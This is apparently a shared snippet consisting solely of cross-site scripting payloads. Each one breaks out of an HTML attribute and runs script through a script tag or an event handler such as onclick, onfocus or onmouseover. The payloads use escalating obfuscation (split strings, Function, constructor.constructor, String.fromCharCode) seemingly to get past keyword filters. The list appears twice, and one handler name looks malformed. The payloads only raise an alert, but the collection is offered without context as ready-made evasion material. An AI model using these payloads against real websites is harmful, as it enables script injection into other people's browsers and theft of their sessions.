st98/xss Secret

## xss
"><script>alert('XSS')</script>
"onclick="window['a'+'lert']('X'+'SS')
"onfocus="Function('al'+'ert('+'\'XS'+'S\')')()
"onblur="0..constructor.constructor('a'+'l'+'e'+'rt('+'\'X'+'S'+'S\')')()
"onchange="0['const'+'ructor']['const'+'ructor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onkeydown="0['con'+'s'+'t'+'r'+'u'+'ctor']['con'+'s'+'t'+'r'+'u'+'ctor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onkeyup="0['co'+'n'+'s'+'t'+'r'+'u'+'c'+'tor']['co'+'n'+'s'+'t'+'r'+'u'+'c'+'tor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmousemove="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmousedown="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmouseover="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmouseout="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmouseup="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onkeypresssrts="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmove="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"ondrag="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onselect="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+String['fromChar'+'C'+'ode'](39,88,83,83,39)+')')()
	"><script>alert('XSS')</script>
	"onclick="window['a'+'lert']('X'+'SS')
	"onfocus="Function('al'+'ert('+'\'XS'+'S\')')()
	"onblur="0..constructor.constructor('a'+'l'+'e'+'rt('+'\'X'+'S'+'S\')')()
	"onchange="0['const'+'ructor']['const'+'ructor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onkeydown="0['con'+'s'+'t'+'r'+'u'+'ctor']['con'+'s'+'t'+'r'+'u'+'ctor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onkeyup="0['co'+'n'+'s'+'t'+'r'+'u'+'c'+'tor']['co'+'n'+'s'+'t'+'r'+'u'+'c'+'tor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onmousemove="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onmousedown="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onmouseover="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onmouseout="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onmouseup="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onkeypresssrts="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onmove="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"ondrag="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
	"onselect="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+String['fromChar'+'C'+'ode'](39,88,83,83,39)+')')()